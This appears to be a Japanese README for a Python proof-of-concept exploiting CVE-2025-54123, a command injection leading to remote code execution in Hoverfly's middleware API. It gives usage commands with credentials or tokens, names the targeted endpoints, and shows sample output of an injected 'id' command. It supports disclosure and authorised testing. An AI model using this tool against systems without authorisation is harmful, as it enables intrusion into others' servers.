
CVE-2025-54123のPython proof-of-concept。HoverflyミドルウェアAPIにおけるコマンドインジェクションからRCEに至ることを示し、資格情報またはトークンベース認証を伴う。
このリポジトリには、CVE-2025-54123 の影響を受ける Hoverfly インスタンスと対話するための Python 概念実証 (PoC) スクリプトが含まれています。
このスクリプトは以下をサポートします:
警告
このプロジェクトは、許可されたセキュリティ研究、テスト、教育目的のみを対象としています。明示的な許可なくシステムに対して使用しないでください。
依存関係をインストール:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
認証情報が提供された場合:
/api/token-auth
スクリプトは次の場所と通信します:
/api/v2/hoverfly/middleware
認証された PUT リクエストを使用します。
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
このリポジトリは、教育、防御的なセキュリティ、および許可されたテスト目的のみで提供されます。作者は、本ソフトウェアの使用に起因する誤用、損害、または法的結果について一切の責任を負いません。
| 引数 | 説明 |
|---|
--target | 対象のドメインまたは IP アドレス |
--port | 対象サービスのポート |
-u | Hoverfly のユーザー名 |
-p | Hoverfly のパスワード |
--token | 既存のベアラートークン |
--cmd | ミドルウェアエンドポイントに送信するコマンド文字列 |